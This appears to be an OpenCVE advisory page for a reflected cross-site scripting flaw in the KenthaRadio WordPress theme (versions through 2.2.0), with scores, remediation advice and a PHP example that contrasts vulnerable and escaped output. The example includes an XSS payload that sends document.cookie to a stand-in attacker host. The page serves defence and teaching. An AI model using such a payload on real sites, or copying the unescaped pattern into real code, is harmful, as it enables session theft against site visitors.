Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QantumThemes KenthaRadio qt-kentharadio allows Reflected XSS. This issue affects KenthaRadio: from n/a through <= 2.2.0.
Published: 2026-01-22
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Improper neutralization of user-supplied data during web page generation allows an attacker to inject malicious script that executes in the target's browser. This reflected cross‑site scripting flaw (CWE‑79) can lead to session hijacking, cookie theft, defacement, or phishing attacks, compromising user confidentiality and site integrity.

Affected Systems

All instances of the QantumThemes KenthaRadio WordPress theme up to and including version 2.2.0 are affected. The advisory gives no lower bound for the affected range ("from n/a"), so every release up to and including 2.2.0 should be treated as vulnerable, regardless of which other plugins or which WordPress core version is installed.

Risk and Exploitability

The CVSS 3.1 score of 7.1 (vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L) classifies this as a high-severity flaw: it is reachable over the network without authentication, but it requires user interaction, and the changed scope reflects that the script runs in the visitor's browser rather than in the vulnerable component itself. The EPSS score of less than 1 percent indicates a very low likelihood of exploitation in the wild, the issue is not listed in the CISA KEV catalogue, and the SSVC assessment records no known exploitation and rates it not automatable. As with any reflected XSS, the attacker crafts a URL or form submission whose parameter is reflected unescaped into the response, so a victim has to be lured into opening the manipulated resource, typically through a phishing link or other social engineering. When the victim follows the crafted URL, the injected script runs in their browser in the origin of the affected site, with whatever session and cookies the victim holds there, allowing the attacker to steal data or perform actions as that user.

Generated by OpenCVE AI on April 29, 2026 at 10:49 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the KenthaRadio theme as soon as the vendor publishes a release that addresses this issue. At the time of writing this page lists no fixed version, so check the vendor's changelog and the Patchstack advisory for a release later than 2.2.0 before treating an update as a fix.
  • Ensure that the theme escapes all user-controlled data at output time with the WordPress escaping function for the relevant context (esc_html() for text nodes, esc_attr() for attribute values, esc_url() for links) and sanitizes request parameters on input (for example with sanitize_text_field()). Escaping must match the output context: an HTML-escaped value is still dangerous when placed inside an inline script block or a URL.
  • If a theme update is not immediately possible, identify the template files that echo request parameters ($_GET, $_POST, $_REQUEST) without escaping and disable those components or patch them locally, and consider switching to a different theme until a patch is available.
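The pattern the analysis above describes (a request parameter reflected unescaped into the page) next to the output escaping the recommendations call for, as an added illustration that is not KenthaRadio's code. The parameter name q, the template markup and the payload are assumptions constructed for this example; the advisory does not disclose which parameter or template is affected. Inside WordPress the real esc_html(), esc_attr() and sanitize_text_field() are used; outside it the stand-ins at the top let the file run with plain `php render.php`.

```php
<?php
// Added illustration of the flaw class, not KenthaRadio code. The parameter
// name `q`, the template markup and the payload below are assumptions chosen
// for this example; the advisory does not say which parameter or template
// is affected.

// Stand-ins so the file also runs outside WordPress (`php render.php`).
// Inside WordPress these functions already exist and the real ones are used.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    // Reduced stand-in for WordPress's sanitize_text_field(): strips tags and
    // surrounding whitespace. Input sanitising is defence in depth only;
    // escaping at output time is what actually prevents the injection.
    function sanitize_text_field($str) {
        return trim(strip_tags((string) $str));
    }
}

/**
 * Vulnerable pattern: a request parameter is concatenated into the response
 * verbatim, so a crafted link can close the attribute and inject script that
 * runs in the visitor's browser (reflected XSS, CWE-79).
 */
function render_search_box_vulnerable(array $request): string
{
    $q = $request['q'] ?? '';
    return '<input type="text" name="q" value="' . $q . '">' . "\n"
         . '<p>Results for ' . $q . '</p>';
}

/**
 * Hardened pattern: sanitise on input and escape for the exact output
 * context: esc_attr() for the attribute value, esc_html() for the text node.
 */
function render_search_box_hardened(array $request): string
{
    $q = sanitize_text_field($request['q'] ?? '');
    return '<input type="text" name="q" value="' . esc_attr($q) . '">' . "\n"
         . '<p>Results for ' . esc_html($q) . '</p>';
}

// Constructed payload of the kind a phishing link would carry: it closes the
// value attribute, then appends a script that sends the cookies elsewhere.
$crafted = [
    'q' => '"><script>location="https://attacker.example/?c="+document.cookie</script>',
];

echo "Vulnerable output:\n", render_search_box_vulnerable($crafted), "\n\n";
echo "Hardened output:\n", render_search_box_hardened($crafted), "\n";
```

In the vulnerable output the double quote in the payload terminates the value attribute and the script tag is emitted as markup; in the hardened output the quotes and angle brackets arrive as HTML entities and the browser renders them as text. Escaping is context-specific: a value placed into an href or src attribute needs esc_url() rather than esc_attr(), and a value placed inside an inline script needs JSON encoding, not HTML escaping.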


Advisories

No advisories yet.

History

Wed, 28 Jan 2026 17:15:00 +0000

Type      Values Removed   Values Added
Metrics                    cvssV3_1: {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}
                           ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 23 Jan 2026 16:45:00 +0000

Type                  Values Removed   Values Added
First Time appeared                    Qantumthemes
                                       Qantumthemes kentharadio
                                       Wordpress
                                       Wordpress wordpress
Vendors & Products                     Qantumthemes
                                       Qantumthemes kentharadio
                                       Wordpress
                                       Wordpress wordpress

Thu, 22 Jan 2026 23:00:00 +0000

Type          Values Removed   Values Added
Description                    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QantumThemes KenthaRadio qt-kentharadio allows Reflected XSS. This issue affects KenthaRadio: from n/a through <= 2.2.0.
Title                          WordPress KenthaRadio theme <= 2.2.0 - Reflected Cross Site Scripting (XSS) vulnerability
Weaknesses                     CWE-79
References

MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T20:31:21.645Z

Reserved: 2025-12-29T11:18:13.437Z

Link: CVE-2025-69003

Vulnrichment

Updated: 2026-01-28T16:37:25.615Z

NVD

Status : Deferred

Published: 2026-01-22T17:16:16.077

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-69003

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-29T11:00:10Z

Weaknesses